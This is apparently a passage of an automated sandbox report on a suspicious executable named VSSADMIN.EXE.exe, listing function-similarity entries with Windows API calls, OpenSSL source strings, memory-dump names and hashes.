• Opcode ID: 87663b63aee2c8a84d417a22dd3cc71da84cd46cd72d182d0421c23b89921904
• Instruction ID: 2e40456ab58387b5b3d3ced8f526ecf2c6219b08c69dc03f75355d0f082e8f35
• Opcode Fuzzy Hash: 87663b63aee2c8a84d417a22dd3cc71da84cd46cd72d182d0421c23b89921904
• Instruction Fuzzy Hash: DBD1D572B18E828AE711CF75D4802AC37B1FB56BA8B404136EF5D97B99EE38D416D300
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C57C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C607
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: e65a1ef3f10fff74d3232b46e78c6d325de19383b218cad3662b4f5595b6db4d
• Instruction ID: 8ec18fb021b556b2e0f1d3e6acc8e776c965f3dcf430bb9058c7f304fe65182d
• Opcode Fuzzy Hash: e65a1ef3f10fff74d3232b46e78c6d325de19383b218cad3662b4f5595b6db4d
• Instruction Fuzzy Hash: D991CF32A18E5395F7608F6594C42BD2BB0BB46FA8F54513BDE0EA3A95DF38D482D700
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLast
• String ID: Operation not permitted$unknown
• API String ID: 1452528299-31098287
• Opcode ID: 94f8c0897b9262b15903971c95efbd7132c9d309cbad33c9c887f12970751b17
• Instruction ID: 6d4def61f283320f91e180946809595e99d8e1600e6ea36ba553c245dafe003c
• Opcode Fuzzy Hash: 94f8c0897b9262b15903971c95efbd7132c9d309cbad33c9c887f12970751b17
• Instruction Fuzzy Hash: E0817A62B08A5B86FB18AB11E8343B923A4FB80B84F444531DF5E47296DF7CE448E741
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: 3936f9fd064f0a2d12ee265f0d959771fab9af5f8a09d4fe6c43307fbcccf919
• Instruction ID: 18f7f7ec65ed05b9de3eaf02fb1f48b45cf8e88610e79f34814b461ec7ee7253
• Opcode Fuzzy Hash: 3936f9fd064f0a2d12ee265f0d959771fab9af5f8a09d4fe6c43307fbcccf919
• Instruction Fuzzy Hash: 2E51D672F049228AEB14DB64D9C56BC27B1BB56B78F504136DE1ED3AE5DF38A402CB00
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                      • Opcode ID: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction ID: dd55b42f2fde5e925cf492ec1fec847b750e0a2bf12d2e3cab28159a11257e2f
                                                                                                                                                                      • Opcode Fuzzy Hash: ce0a1e9b89da8c582d0725fbd11fd513ed84fd7ce4f909c8e640cca0bbf582de
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B518222E08A528AFB24DFB5D4903BD73B5AF46F68F10453ADE4D87689EF38D4419704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
• Instruction ID: 827ab80cacc80360e28ac13ff821de4bd6941a9723479130775979797aff58cb
• Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
• Instruction Fuzzy Hash: 04118631E1C94243FA549769E5842B952B3FBCAFA1F484132E94987B99CE2DD5858200
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
• Instruction ID: 7f69d9357170e07e26837de23a0613233fc01596517e9ceb7176968b1c8b03d6
• Opcode Fuzzy Hash: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
• Instruction Fuzzy Hash: D3113326B14F419AEF00CF64E8942B933B4FB19B68F440D32EA6D87764EF79D1958380
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 2e715f355c6c22707ad3ed73b30a5419481e2ec4998e467f77e94f1bde601fe4
• Instruction ID: 6243723ece32913ec4bcdc482baa7c948107280c40b936d205852b500f1de186
• Opcode Fuzzy Hash: 2e715f355c6c22707ad3ed73b30a5419481e2ec4998e467f77e94f1bde601fe4
• Instruction Fuzzy Hash: 28410812A0CA8365FB649B25D58137AE6B0EB82FB8F144236EE5C87AD5DF3ED441C704
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007
• String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
• API String ID: 3568877910-2648760357
• Opcode ID: 4f01d9f861e9c6c8f70647b046dc82b808f72db07d97631f436a9c698cc874c8
• Instruction ID: 0be836f15ca10f036772348612b459bded6037d5135295d1912b8e6ade927ab8
• Opcode Fuzzy Hash: 4f01d9f861e9c6c8f70647b046dc82b808f72db07d97631f436a9c698cc874c8
• Instruction Fuzzy Hash: BF515D72B187858AE764CF19F49066AB7A0FB89B50F444135EB8D87B59EF3CE4449B00
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: getaddrinfo
• String ID: ..\s\crypto\bio\b_addr.c
• API String ID: 300660673-2547254400
• Opcode ID: a2c99f71c7972fb3b7ba828c59694e00382d0b8ec626129309ba30accd8ab733
• Instruction ID: 0e454ae40ad5d8c38936c04922c8d928e6adc8cc45094cf4937343913d05a3b7
• Opcode Fuzzy Hash: a2c99f71c7972fb3b7ba828c59694e00382d0b8ec626129309ba30accd8ab733
• Instruction Fuzzy Hash: E441B472B1878A87EB58DF26E4906BE7751FB84740F004139EB8943B85DF7CD855AB40
Uniqueness

Uniqueness Score: -1.00%

APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF614C87ECE
  • Part of subcall function 00007FF614C89E48: HeapFree.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
  • Part of subcall function 00007FF614C89E48: GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF614C7B135), ref: 00007FF614C87EEC
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\VSSADMIN.EXE.exe
• API String ID: 3580290477-1688815890
• Opcode ID: 32394b7523a72a158e8e671d07237236857a66eb30a973d43268576dac4f19c3
• Instruction ID: 0b2ca9aeb5763d4a833c3ab8aaa6e583eb0686974bacee5ada8daabe44179aa5
• Opcode Fuzzy Hash: 32394b7523a72a158e8e671d07237236857a66eb30a973d43268576dac4f19c3
• Instruction Fuzzy Hash: 0B414D32A09E5385E7159F26D8C00B967B4EB46FE4B544037EA4E87B85DF3DE8519310
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007D592F1170
• String ID: ..\s\crypto\x509v3\v3_utl.c$TRUE
• API String ID: 4247867426-4249600833
• Opcode ID: f6c348c2a3a98660fe814743a8586d2045fedeffcd3228dedd6face5aebd5a41
• Instruction ID: 3818b598d7c902feb4555ed55ef76cf18f3e0cb669f362387e53de3826a9e6b6
• Opcode Fuzzy Hash: f6c348c2a3a98660fe814743a8586d2045fedeffcd3228dedd6face5aebd5a41
• Instruction Fuzzy Hash: D831C023F0A74A85FA189F52A4247A963A0AF84780F484436EF4D27785EF3EE541E301
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 9641b601b92cf1c294df7ef4fdae47acd46cee34d30520abb55b7c3ed1eb45b0
• Instruction ID: 105004092851e96d1fb8d19be8496505c19edd8cfd7d6e0b675a146e1da7a494
• Opcode Fuzzy Hash: 9641b601b92cf1c294df7ef4fdae47acd46cee34d30520abb55b7c3ed1eb45b0
• Instruction Fuzzy Hash: 7D418232618A4296DB20CF65E4843BA6771FB99BA4F504036EE4DC7798DF3CD441D740
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
• Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: 00007
• String ID: ..\s\crypto\rand\randfile.c$Filename=
• API String ID: 3568877910-2201148535
• Opcode ID: 6f88aa77b3787b65bf21e9a5eb4250f5c66180b7d9e03cb661efe32528626253
• Instruction ID: 03af7a973474a73f1550f85d44679be2ce6fd4aae8fe07d5c89a59eaebd24924
• Opcode Fuzzy Hash: 6f88aa77b3787b65bf21e9a5eb4250f5c66180b7d9e03cb661efe32528626253
• Instruction Fuzzy Hash: FA31AEB2B1CB4A86EA28DF25E4607A973A1EF84744F804136DB1D07695EF3DE508E741
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: ec3214c4d7917cf546e280b353fd1dbc1381fd762ef9d9999209277b74e9521f
• Instruction ID: 2dfe0e81140b3302117c91b007f1316cc101a4416b68701f276e916ffa950930
• Opcode Fuzzy Hash: ec3214c4d7917cf546e280b353fd1dbc1381fd762ef9d9999209277b74e9521f
• Instruction Fuzzy Hash: 3621B172A08A8282EB209B15D48427E63B1FB86F64F454037DA8DC3684DF7DE985DB51
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
Similarity
• API ID: ErrorLastgetsockname
• String ID: ..\s\crypto\bio\b_sock.c
• API String ID: 566540725-540685895
• Opcode ID: 6b4fc8a7a88fb01f9812228e0b07841756f3377f257988557045c535e6cc1a7b
• Instruction ID: 0d93c62effcc2fc412836c9601d0ba00da83e6a1d128a697e0a57631ed443482
• Opcode Fuzzy Hash: 6b4fc8a7a88fb01f9812228e0b07841756f3377f257988557045c535e6cc1a7b
• Instruction Fuzzy Hash: 2821B0B2B0860A86E724DF60E8616EEB360EF80755F400135EB6C02AD4DF7DE599EB40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Fatal error detected
• API String ID: 1878133881-4025702859
• Opcode ID: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
• Instruction ID: a49303f06f8780b8e014b4f9c7065a12ecf7965e4abde25aa76fce8a106fb723
• Opcode Fuzzy Hash: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
• Instruction Fuzzy Hash: D821A67262CA8292EB20DB14F4906EA7374FF95B98F805136E64D87A65DF3DD245C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error detected
• API String ID: 1878133881-3513342764
• Opcode ID: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
• Instruction ID: e4213435244b9469cfa5219e9e3788d136793a4e1cb18b9816c5f1dd7773f744
• Opcode Fuzzy Hash: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
• Instruction Fuzzy Hash: BA21867262CA8292EB20D714F4916EAB374FF95B98F805136E68D87A65DF3DD205C700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
• Instruction ID: fec1f0a4ab71d96dae5c7cde083ccec8d9e5605f7e08bb13d27bbcb3617339c3
• Opcode Fuzzy Hash: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
• Instruction Fuzzy Hash: A8113D32608F8182EB158F15F48026977A4FB89FA8F184235DF8D47764DF3DD5518700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: DriveType_invalid_parameter_noinfo
• String ID: :
• API String ID: 2595371189-336475711
• Opcode ID: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
• Instruction ID: c4f82c2235458d99cb60745b9e31a72a69d7a9732c52fc391b20815b90c59dec
• Opcode Fuzzy Hash: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
• Instruction Fuzzy Hash: C1018461A1CA438AFB209F6094E127E63B0EF46B68F440137D74DC7691EF2DE545DA18
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastioctlsocket
                                                                                                                                                                      • String ID: ..\s\crypto\bio\b_sock.c
                                                                                                                                                                      • API String ID: 1021210092-540685895
                                                                                                                                                                      • Opcode ID: 4d68a102142dda0a141e0aa41e49ba71bac8bdbe77c0eb6d10dc70971b8a66ca
                                                                                                                                                                      • Instruction ID: 291cba6b400d356c539aa8b98ba3f851da15430f0dc7b5655f966bf069994d25
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d68a102142dda0a141e0aa41e49ba71bac8bdbe77c0eb6d10dc70971b8a66ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 86E0D861F0860B86F7185F60E870B792350EF44705F000534EF5D82790DF2DE558AA00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.205715498.00007FFCDFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCDFCB0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffcdfcb0000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 218e1b302597229f65b0dfd977a784d911dfa0ddb02c1604bd0712749584263a
                                                                                                                                                                      • Instruction ID: 239bbca0a9d0f20ccb27ed54938c24129131d8096f4f457731595a39f882fa1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 218e1b302597229f65b0dfd977a784d911dfa0ddb02c1604bd0712749584263a
                                                                                                                                                                      • Instruction Fuzzy Hash: F7D12436A0DAAE4FEBA5976898151BD7BA1FF85390F0801FFD05DC70D3DA18A814D351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
